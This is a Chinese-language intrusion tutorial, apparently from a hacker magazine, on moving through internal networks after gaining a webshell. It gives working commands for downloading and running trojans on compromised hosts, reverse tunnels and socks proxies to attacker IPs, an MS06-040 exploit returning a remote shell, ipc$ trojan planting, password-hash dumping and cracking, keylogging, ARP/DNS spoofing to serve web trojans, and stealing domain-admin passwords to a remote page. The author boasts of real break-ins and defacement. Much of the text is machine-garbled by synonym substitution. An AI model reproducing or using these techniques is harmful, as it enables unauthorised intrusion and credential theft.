[摘要]常常在一些BBS里和一些杂志里看到,渗透渗出XX网站, 实在就是拿了扔了一个WEBSHELL在上面, 严格来说这根本算不上渗透渗出。 由于当你进了XX内网面临N多的机器的时候, 才知道, 内网是多... 常常在一些BBS里和一些杂志里看到,渗透渗出XX网站, 实在就是拿了扔了一个WEBSHELL在上面, 严格来说这根本算不上渗透渗出。 由于当你进了XX内网面临N多的机器的时候, 才知道, 内网是多么的庞大。 下面我们先来看两张内网的拓扑结构图, 图1, 图2所示。 假如有的朋友现在还不了解路由器和交换机等什么意思, 那应该好好补习一下了。 这里在说一下什么叫内网, 可能有的朋友认192.168.1.x这样的形式就是内网, 前段时间qq上一朋友挂出一台机器, 告诉我有内网, 我问他怎么判定的, 他说执行ipconfig /all的时候看见内网地址了, 实在这样判定太过草率, 好比说我为了安全, 我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网, 实在我有内网吗?是没有的。 在渗透渗出内网之前我们先来了解一下局域网常见的拓扑结构, 网络中的计算机等设备要实现互联, 就需要以一定的结构方式进行连接, 这种连接方式就叫做"拓扑结构", 通俗地讲这些网络设备如何连接在一起的。 目前常见的网络拓扑结构主要有以下四大类:1、星型结构, 2、环型结构, 3、总线型结构, 4、星型和总线型结合的复合型结构。 由于文章是讨论渗透渗出内网的, 所以每种的具体先容, 我就不列出来了, 大家简朴了解下就可以了, 有爱好的可以每一种都百度下。 可能刚入门的朋友不是很了解为什么内网而我们还能访问到呢, 现在良多服务器都是用了硬件防火墙作的映射, 也就是说他的所有服务器实在都在防火墙以后并且没有外网IP, 可能有人会说, 没有外网IP那我们访问它网站用的IP是什么呢?假如使用硬件防火墙配置过这种环境过朋友就明白了, 这是现在良多包括海内至公司流行的NAT配置方法, 这样相对来说比较安全, 这样就需要我们在渗透渗出的时候做端口映射。 下面我把以前入侵渗透渗出的几回内网过程并把一些思路, 一些高手们的渗透渗出经验, 和一些用到或没用到的工具都综合的说一下。 首先是通过脚本漏洞获得了一个WEBSHELL, 服务器开的端口有21和80, 并没有开过多的端口, 没有装SU, pcAnywhere等第三方软件, wscript.shell为真, 上传CMD能执行一些简朴的命令, 其他脚本木马权限一样, 这台服务器上面就两个站, 目录权限不是很严, 发现D盘下有一个字符替代器, 如图3所示。 直接把下回本地看看是什么东东, 原来是一个查找字符的工具, 如图4所示。 难道这站以前让人搞过, 治理员用来查找被改文件的, 试了一下可以改名, 如图5, 那么好办了, 我直接捆了一个木马在上面, 把这个删掉, 等着治理员上线吧, 等了两天治理员仍是没有上线, 这么等下去也不是办法, 只好把首页涂了, 告诉他网站有漏洞, 已被人植入木马, 请查找木马之类的, 并修改了几个重要文件的时间, 果然治理员上线了。 如图6。 执行ipconfig /all果然有内网IP, 图7。 既然没开终端太不利便, 我直接帮它开了吧, 后来这台机器我又做了VPN, 开3389可以用手工和工具都可以的, 这里带给大家二个开3389的工具, 都还比较不错, 一个是火狐的开3389的工具, 另一个是特南克斯, 这里我用的是特南克斯的, 至于怎么把程序传到肉鸡上办法良多, 可以用远程程序直接传, 也可以在本机架FTP服务器, 用到20cn的FTP服务器, 图8。 设置好用户和密码后cmdshell里执行: echo o 你架设FTP的IP>ftp.txt echo hacklu>>ftp.txt //写入ftp.txt用户名 echo 123456>>ftp.txt //写入ftp.txt密码 echo bin>>ftp.txt //二进制方式转输 echo get 11.exe>>ftp.txt //将11.exe下载到肉鸡 echo bye>>ftp.txt //断开FTP type ftp.txt //查看写入是否有错误 ftp -s:ftp.txt //执行FTP.TXT里的内容 del ftp.txt //删除ftp.txt 这样我们就可以把11.exe下载到肉鸡运行就可以了, 也可以用0803期杂志提到的VBS工具, 适合不超过300KB的程序。 把EXE转成BAT在上传, 工具运行好会自动判定是2000系统或者2003系统, 2000系统则自己重启, 也可以自定义终端端口, 运行结果如图9所示。 在执行netstat -an发现3389开放, 当然这样直接连是连接不上的, 由于我们外界是无法直接访问到内部机器的, 但可以让内网机器来访问我们, 好比现在流行的反弹木马, 这样就需要我们做端口映射, 说到端口映射工具当然代表作就是LCX写的工具了, 首先在本机执行lcx -listen 99 9833, 在肉鸡上执行lcx -slave 123.114.120.115 127.0.0.1 99 3389, 意思是在本机监听99和9833端口, 把99端口数据转到9833上面, 然后把肉鸡的3389端口数据转到本机的99端口上, 然后就可以拿连接器连接本地的9833端口了, 如图10所示。 而希奇的是这次却没有连上, 那就用下教主的高级内网渗透渗出工具Paris, 工具其他功能未几说了, 只说下端口映射的功能, 传msxidc和vVXDc.dll到目标内网机器, 在目标机器执行:msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22, 在自己机器或者有公网IP的肉鸡:MAPServer.EXE -p22, 这时候只要连接本机的或者公网IP肉鸡的22端口就可以了, 在说一款比较不错的工具, htran.exe, 能开启Socks5服务, 但我们只说端口映射, 命令:在公网肉鸡监听(临听任意两个端口):htran -p -listen 119 120, 在内网的机器执行:htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389, 这样是把这个内网肉鸡的3389转发到公网肉鸡或者自己机器的119端口上, 然后再用3389登陆器连接公网肉鸡的120端口。 或者连接本机的120端口, 如图11所示。 这几款工具各有上风, 大家在渗透渗出的时候根据需要自己选择吧。 端口映射大家在渗透渗出的时候可能已经不少朋友用过了, 但很少看到有人是直接反弹代办代理来连接, 反弹socks代办代理好处是我们直接可以连接内网的其它机器, 而不需要在去转端口。 最近“凋凌玫瑰”写了一个内网渗透渗出利器---hd, 使用方法如下, 首先在本机监听: c:\>hd -s -listen 53 1180 [+] Listening ConnectBack Port 53 ...... [+] Listen OK! [+] Listening Socks5 Agent Port 1180 ...... [+] Listen2 OK! [+] Waiting for MainSocket on port:53 ...... 此命令是将连接进来的53端口的数据包连接到1180端口。 在对方机器上运行: C:\RECYCLER>hd -s -connect x.x.x.x 53 [+] MainSocket Connect to x.x.x.x:53 Success! [+] Send Main Command ok! [+] Recv Main Command ok! [+] Send Main Command again ok! 上面的x.x.x.x为你的外网ip, 这时我们接收到反弹归来的代办代理显示的情况。 如图12。 然后在本机设置sockscap, 设置在控制台的”文件”-“设置”里, 控制台可以将你需要代办代理的程序放在上面, 直接拖进去即可, 控制台机的程序就可以进接连接内网的机器了。 如直接用mstsc连接内网其它机器的3389, 就可以上去登录治理。 如图13,14所示。 进了3389后我们第一步需要干什么?可能良多朋友都是留后门, 像什么上帝之门、SHIFT后门, 记实3389帐号等等。 当然留什么后门好不在本文讨论之中。 我个人比较喜欢抓HASH(哈希),一般是pwdump+lc5, 一般我破解的时候数字加字母的10位组合在3个小时左右就可以破得出来, 而且现在还有破解HASH的彩虹表, 不外体积是很庞大的, 在有前段时间在网上看见一篇文章, 文章名字是“卸载补丁去除保护 获取Windows 2003密码”, 大致意思是卸载Windows2003 SP1/SP2, 由于windows 2003 +SP0才可以利用findpass从winlogin进程中抓出系统账号明文密码, 抓出密码在重安装上补丁。 我个人没有实验过, 此方法很暴力, 我个人也不推荐这么做, 很轻易被发现的。 那什么是HASH呢?Hash简朴点讲就是把任意一段数据经由某种算法天生一段独一的固定长度的数据。 Hash, 一般翻译做"散列", 也有直接音译为"哈希"的, 通过散列算法, 变换成固定长度的输出, 该输出就是散列值。 HASH主要用于信息安全领域中加密算法, 他把一些不同长度的信息转化成杂乱的128位的编码里,叫做HASH值. 也可以说, hash就是找到一种数据内容和数据存放地址之间的映射关系。 对于哈希菜鸟也可以这么理解, 即保留电脑上治理员登录的一种加密后的密码, 至于什么具体加密算法, 有爱好的朋友可以百度下, 例如我这里用的是SAMInside抓HASH, 程序打开后我们选择小人这里, 点击使用LSASS输入本地用户, 如图15。 这样计算机的用户名和HASH值就会泛起在列表里, 如图16。 直接点右上方的开始就可以破解密码了, 图17所示, 也可以导出用LC5破解, 在选择--文件--输出用户到PWDUMP, 这样把HASH保留为文件文件, 图18。 也可以用PWDUMP抓, 如图19, 最后我们把内容复制下来保留文本文件用LC5破解, LC5的安装非常的简朴, 一直下一步即可。 程序自己带注册机, 我们在注册一下, 完事后我们在程序主页面导入刚才保留的hash.txt, 点击导入按钮(第六个), 在选择从PWDUMP文件, 用户列表就会显示出来了, 在点击开始就可以破解了, 如图20,21所示。 而对于2000的系统我们直接可以用MT读出密码, 直接运行mt -findpass,如图22所示, 为什么要破解本秘要码, 由于在内网渗透渗出的过程中抓出一台治理员的密码是很重要的, 现在我们有了内网一台机器了, 当然要继承渗透渗出下去, 在这里我总结一下几种方法, 方法一、扫描弱口令, ipc$连接。 方法二、靠自己的命运运限和治理员的懒惰加社会工程学。 方法三、溢出。 方法四、arp欺骗, DNS欺骗。 方法五、域结构下的渗透渗出。 这里简朴的总结五方面, 但是每一方面详细利用起来又包括很细节在里面。 方法一、扫描弱口令, ipc$连接。 可以用XScan-v3.3扫描器扫一下内网, 设置好IP和端口, 端口设置可以查看本机装有什么软件, 例如本机装有radmin, pcAnywhere等等, 那我们就扫描4899,5631等端口, 如图23, 然后用本机的知道的密码去连接。 当然假如改成别的端口我们根据情况转换一下, 有的时候在外网的机器很坚固, 到了内网的时候就很脆弱了。 当然现在机器已经很少弱口令了, 但是我们有本机治理员帐户和密码, 治理员为了利便往往都设置成一样的, 由于做系统的时候做完一台直接GHOST别的系统。 而ipc$连接可以是说长短常古老和经典的。 IPC 是Internet Process Connection的缩写, 也就是远程网络连接。 WindowsNT/2000/XP/2003默认都提供了IPC$管道连接, 就是在两个计算机进程之间建立通讯连接。 打个比方, IPC连接就像是挖好的隧道, 程序可通过隧道访问远程主机。 默认情况下, IPC是共享的, 也就是说微软已经为我们挖好了这个隧道(IPC), 因此, 这种基于IPC的入侵也经常被简称为IPC入侵。 IPC 后面的$是共享的意思, 不外是躲藏的共享, 微软系统顶用“$”表示躲藏的共享, 好比C$就是躲藏的共享C盘。 也就是说C盘是共享的。 ipc$连接这个只能说是治理员开的共享, 严格来说不能算一个漏洞, 目标主机还需知足两个前提:1、目标主机开启了ipc$共享 ;2、拥有目标主机的治理员帐号和密码 。 当年在2000系统的时候ipc$入侵可以说是风扉一时。 这里我用两台XP做演示, 打开命令提示符在CMD下输入:net use \\IP\ipc$ "password" /user:"username" 建立非空连接, 接着copy \路径\*.exe \\IP\共享目录名, 向远程主机复制文件, 接着net time \\IP, 查看远程主机确当前时间, 图24所示, 接着就可以用计划任务运行我们COPY过去的程序了, 执行at \\ip 时间 程序名, 远程添加计划任务, 图25所示。 可以按照我们划定的时间内运行程序, 假如对方禁止了计划任务, 默认是开启的, 我们可以把文件复制到对方启动目录, 先执行net use z: \\IP\c$, 是把对方C盘映射到本机Z盘上, 这样我们直接将木马放在启动目录, 如图26所示。 等复制完了想断开了可以用命令, net use z: /del /y, 这样可以删除映射的z盘 假如有朋友也手工输入命令麻烦, 也可以用20CN的IPC扫描器, 可以同步植入木马。 如图27所示。 在域控的环境中, 我们只要得到域控密码就可以直接用ipc连接治理员机器种马。 后面会先容域环境下的渗透渗出。 方法二、靠自己的命运运限和治理员的懒惰加社会工程学。 (推荐非安全出的黑客社会工程学攻击一书) 这里所说的命运运限是刚才说过的, 好比说治理员为了利便设置“密码一卡通”扫描内网开3389端口的机器, 用破出来的本秘要码连接所有开3389的机器, 我曾经入侵一个台湾的内网就是密码都是一样的, 或者可以在本机装上键盘记实, 安装键盘记实的目地不光是记实本秘要码, 是记实治理员一切的密码, 好比说信箱, WEB网页密码等等, 这样也可以得到治理员的良多信息。 这里我用的是键盘记实巨匠, 首先运行keyboardlog.exe, 然后点"开起监控", 留意这个程序只要运行一次就可以了, 以后开机的时候自动运行。 程序运行后如图28的界面, 我们点击开始监控就可以了。 这个工具可以记实中文, 这点对于有些机器仍是不错的, 记实的文件可以设置, 方法为修改config.ini里的文件. 格局为如 c:\1111.txt,然后再运行keyboardlog.exe,点击休止监控, 然后再重新点开始监控。 如图29是记实到的内容。 至于记实的什么内容就要靠大家去分析然后配合社会工程学了。 方法三、内网溢出。 溢出从技术角度可以分为堆溢出和栈溢出, 这点我们先不说, 从另一个角度则分为远程(remote)溢出和本地(local)溢出, 远程溢出也就是通过对方的一些网络上的服务对我们提交的的数据没有严格的检查, 我们提交一些精心构造的数据, 可以迫使对方的主机执行我们指定的动作:好比添加用户, 打开端口, 反弹一个SHELL给我们等等。 这种方法放在现在来说可以说是成功率很低的, 由于现在基本都是自己打补丁了, 假如在向撤退退却个二三年仍是可以的, 但并不代表没有一点不可能, 06的时候朽木在腾讯内网的时候就是靠嗅域治理员的哈希和MS06035溢出其他的机器, 对于比较火的05年的MS05039,06年的MS06035、06040, 07年DNS溢出等等, 这就需要我们多关注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微软漏洞发布的地方, 当然内网溢出不一定非得靠系统漏洞, 可以查看本机装有那些第三方程序, 然后溢出其他机器的, 这里我以06040+2000系统为例, 首先我们用Superscan3.0扫描内网开放445端口, 如30所示。 在本机用NC监听1234端口, 执行nc -l -v -p 1234, 如图31, 然后用另一个CMD窗口执行, ms06040rpc 对方IP 本机IP 1234 1, 这样用NC监听的端口会返回了对方的CMDSHELL, 如图32、33所示。 在得到CMDSHELL之后, 是添加用户或者给机器中木马, 就看见大家兴趣了。 另外也可以用去年比较火的DNS溢出, DNS服务一般开放53端口。 DNS服务器在有的时候就是域服务器, 关于域环境下参考方法五。 方法四、arp欺骗, DNS欺骗。 这个方法是比较实用, 所以多先容一下。 但同是也是比较轻易暴露自己的, 不少同行在C段方面和内网方面用的都是ARP欺骗, 不少菜菜可能还记得杂志常常看到嗅探的时候用到的ARP欺骗, 我们再来温习一下吧。 首先在内网机器输入arp -a, 如图34所示。 这里第一列显示的是ip地址, 第二列显示的是和ip地址对应的网络接口卡的硬件地址(MAC), 第三列是该ip和mac的对应关系类型。 可见, arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议, 或者说arp协议是一种将ip地址转化成MAC地址的一种协议。 它靠维持在内存中保留的一张表来使ip得以在网络上被目标机器应答。 1、什么是MAC地址、MAC地址也叫物理地址, 硬件地址或链路地址, 同网络设备制造商出产时写在硬件内部。 IP地址与MAC地址在计算机里都是以二进制表示的。 IP地址是32位的, 而MAC地址则是48位的。 MAC地址的长度为48位(6个字节), 通常表示为12个16进制数, 每2个16进制之间用冒号隔开, 如08:00:20:0A:8C:6D就是一个MAC地址, 其中前3位16进制数08:00:20代表网络硬件制造商的编号, 它由IEEE(电子与电子工程师协会)分配, 而后3位16进制数0A:8C:6D代表该制造商所制造的某个网络产品(如网卡)的系列号。 输入ipconfig /all就可以看见本机的MAC地址。 2、什么是ARP, 大家都知道计算机通讯是要有IP地址的吧!可是在局域网中, 计算机之间的通讯是只靠MAC地址来发送数据的。 ARP是一种协议, 用来实现IP地址到MAC地址的转换, 假设192.168.1.1要发一个数据给192.168.1.101, 它就会发出arp广播包问:“谁是192.168.1.101?我要你的MAC地址!”这时候192.168.1.101会回答:“我是192.168.1.101, 我的MAC是AA-AA-AA-AA-AA-AA。 ”然后192.168.1.1就会把这个回答记实下来, 然后再发数据给192.168.1.101的时候就直接构造目地地址为AA-AA-AA-AA-AA-AA的数据包发送。 3、什么是ARP欺骗、经由刚才的ARP查询的过程我们知道, 在询问的过程中, 国为不知道到底谁才是192.168.1.101, 所以192.168.1.1发出的是广播包来询问, 其它的电话固然也收到了这个包但是并不回答。 如果现在有个人, 192.168.1.102居心不良, 想冒充192.168.1.101, 他也可以给192.168.1.1发一个回答的数据包说:“我才是192.168.1.101, 我的MAC地址是BB-BB-BB-BB-BB。 ”那么192.168.1.1就会把原先的那条记实从MAC地址表中删除掉, 写入新的这个地址对应关系, 这就是arp欺骗。 4、什么是网关、在局域网中, 所有的电脑可能是共用一个网络出口, 这个出口就是网关了。 网关可以是一台电脑, 也可以是一个路由器的某个接口, 它一样有自己的IP地址, 局域网中所有的要发到外部的数据包都直接递交给网关, 网关负责将这个数据包传递到远程网络, 再将外界返回的数据分发给局域网中的指定电脑。 TCP/IP协议是如斯的脆弱, ARP协议在设计确当初并没有充分的考虑到安全题目, 所以今天才泛起N多的arp欺骗工具, 在先容工具之前, 我们再来谈谈服务器在机房中的情况。 一般而言, 现在流行的的主机托管方式置放的服务器是和良多别的服务器放在一个机柜上, 大家共用一个交换机共享100M的带宽, 这样就造成了一个题目, 那些没有做端口隔离的的机房(绝大多数机房都是这样的)每个交换机下的所有服务器构成一个局域网。 在这个局域网下, 大家就可以玩arp欺骗了。 说到arp嗅探的工具要先提一下有一定的位置的cain, 官方最新版为4.918, 我们先要进行安装, 如图35所示。 直接NEXT下一步就可以了, 安装好我们运行CAIN, 点击Sniffer, 在选择工具栏第二个按钮, 在点击十字架, 在弹出对话框中我们选择子网中所有计算机, 如图36所示。 在Configure选项里我们可以根据需要选择端口, 如21、80、3389等。 如图37所示。 这时在选择下面的arp, 十字按钮是灰色的, 我们点击一下空缺处, 在选择十字按钮, 在弹出的对话框里左边选择网关, 右边选择欺骗的IP。 最后点开始嗅探, 上面第二个按钮。 如图38所示。 这样就能嗅到数据了, 图39是嗅到的HTTP密码。 另外假如嗅到了3389密码我们在上面打开文档, 在里面可以找到密码, 如图40所示。 大家在用CAIN嗅探的时候可能碰到过这样的情况, 数据一大就当机了, 过了很少时间都连不上了, 所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。 这样会大大的减少当机的可能性。 假如看到丢包率超过10%就要留意啦, 赶快停掉, 看看那里没设置好吧。 另外提供一个“chong”写的BAT程序, 在开嗅的时候运行它就可以了。 ======start========= :ping ping g.cn IF ERRORLEVEL 1 GOTO reboot IF ERRORLEVEL 0 GOTO ping :reboot iisreset /reboot ======end========= 这里的g.cn你可以设置为网关的IP或你的IP 假如能ping通的话就继承ping 假如不通的话就以为当机了 (事先自己先测试下)。 在说下DSN欺骗, 我们看下DNS是怎样工作的, DNS是全称是Domain Name Server, 既域名服务器。 当一台主机发送一个哀求要求解析某个域名时, 他会首先把解析哀求发到自己的DNS服务器上。 假如内网里的192.168.1.101要访问百度www.baidu.com, 但不知道其IP地址, 这时192.168.1.101主机询问网关192.168.1.1, www.baidu.com的IP是多少, 假如这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页木马的IP, 这样就实现了DNS域名欺骗。 首先用前面的先容的列出内网机器, 然后在ARP里选择arp-DNS, 点击空缺处激活十字按钮, 弹出一个DNS欺骗对话框, 在哀求DNS域名栏中填入对方要访问的网站, 如www.baidu.com, 然后在用来改写响应的IP地栏, 如图41所示。 而我们响应的地址可以是一个网页木马的地址, 这里我以网关为例, 也就是说192.168.1.101访问www.baidu.com的时候会转向192.168.1.1的页面, 我们先来访问一下192.168.1.1, 如图42所示, 我们在192.168.1.104的机器上装CAIN开始DSN欺骗后访问百度网页, 如图43所示。 是不是也和192.168.1.1一样了, 假如我们在本架设一个HTTP服务器, 挂上一个网马后, 就能欺骗访问者了, 当然假如想做的更像, 可以制作一个和欺骗主页一样的页面。 方法五、域结构下的渗透渗出。 在入侵域结构内网之前我们先来了解一下什么是域, 可能大家对工作组比较认识了, 而域和工作组是不一样的, 工作组是一群计算机的集合, 它仅仅是一个逻辑的集合, 各自计算机仍是各自治理的, 你要访问其中的计算机, 仍是要到被访问计算机上来实现用户验证的。 而域不同, 域是一个有安全边界的计算机集合, 在统一个域中的计算机彼此之间已经建立了信任关系, 在域内访问其他机器, 不再需要被访问机器的许可了。 也就是域用户登录, 超级大的权限。 而域还可以扩展, 像域树, 域林。 在一个网络中既可以有多个多级子域、域树, 还可以有多个林。 为了大家好理解, 我这里举个例子, 例如一个内网是一个大楼, 而每层的每个房间是一台计算机, 当然每个房间的钥匙只有房间的主人才拥有, 但大楼建立一个保安室, 而这保安室为了治理利便有一把可以打开任意房间的钥匙。 前题是这个房间答应加入保安的治理范围内, 这个保安室就是域控制器, 当然在形象的说大楼可以是10层, 而每一层都有一个保安室, 也可以有一个总的保安室。 当然在往大的说也可以有良多大楼, 大楼与大楼之间为了利便也可以建立共享。 如流动目录的域, 流动目录可以贯串一个或多个域。 在独立的计算机上, 域即指计算机本身, 一个域可以分布在多个物理位置上, 同时一个物理位置又可以划分不同网段为不同的域, 每个域都有自己的安全策略以及它与其他域的信任关系。 当多个域通过信任关系连接起来之后, 流动目录可以被多个信任域域共享。 在往回说每台机器像一个树叶, 而我们控制了树叶, 还想控制树杈, 而最后还想控制这个大树, 这时候就到域根了。 而一棵树是在一片森林当中的。 在入侵内网的时候, 一般先用net view查看内网的情况, 列出共享的域、计算机或资源的列表。 如图44所示。 如何判定有没有域呢, 实在一个ipconfig /all基本就看出来了, 大家在回到图7当中, 留意一下第二项, 也就是Primary Dns Suffix这项, 从这个命令我们可以得知, 存在一个域xxxx-cc.com, 我们ping一下域xxxx-cc.com, 得到域服务器的ip。 如图45所示。 或者用命令net config workstation, 会显示本机计算机名和治理员用户名, 工作站的域DNS名称及登录到的域, 如图46所示。 接着执行net localgroup administrators来看一下本机在域里面的角色, 如图47所示。 看来只是一个普通域用户。 我们再来查看一下域里面有多少的用户, 执行net user /domain, 域里面的用户良多, 如图48所示。 域里面这么多用户, 那么我们再查看一下域治理员有哪些, 执行net group "domain admins" /domain, 貌似只有一个域治理员。 如图49所示。 大家知道在域治理网络中只要搞定了域治理员内网一切机器都OK了, 现在域服务器有了, 域治理员有了。 思路呢?可以用上面的几种方法来入侵域服务器, 如arp嗅探域服务器, 而域治理器在良多时候也是DNS服务器, 也可以尝试DNS溢出等。 这里我为大家推荐一个Winlogon劫持记实3389密码小工具, 原作者为“lovemfc”, 我们用这个不是记实本机登录的3389密码, 当然本机也是可以记实的, 更不错的是可以记实域治理员登录本机的密码, 由于域治理员是有权限登录下面每台用户的机器的。 缺点是记实密码的东西只能保留本机上, 而ASM根据这个写了一个发信版的天生器, 这就利便我们大家了, 程序运行后如图50。 选择好接受的ASP地址后, 天生出来CreateServer.exe, 直接在服务器上运行即可, post.asp会在你的URL地址下天生key.txt。 合用范围2003系统, 图51是我记实到本机治理员和域治理员的密码, 这下就可以纵横整个内网了。 在服务器上扫描开放3389端口的, 用域治理员登录全部OK, 在域控的环境中, 我们只要得到域控密码也可以直接用ipc连接治理员机器种马。 最后登录内网几台机器抓图纪念一下, 如图52。 最后说一下本文章只做菜鸟渗透渗出入门文章, 当然内网渗透渗出还有其他深入的技巧, 如主动会话劫持等, 因本人时间和水平都有限, 文章中不足之处欢迎大家批评指正。 菜菜朋友们在文章中如有题目联系我可以去非安全官方网站, ID:樱花浪子。
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
|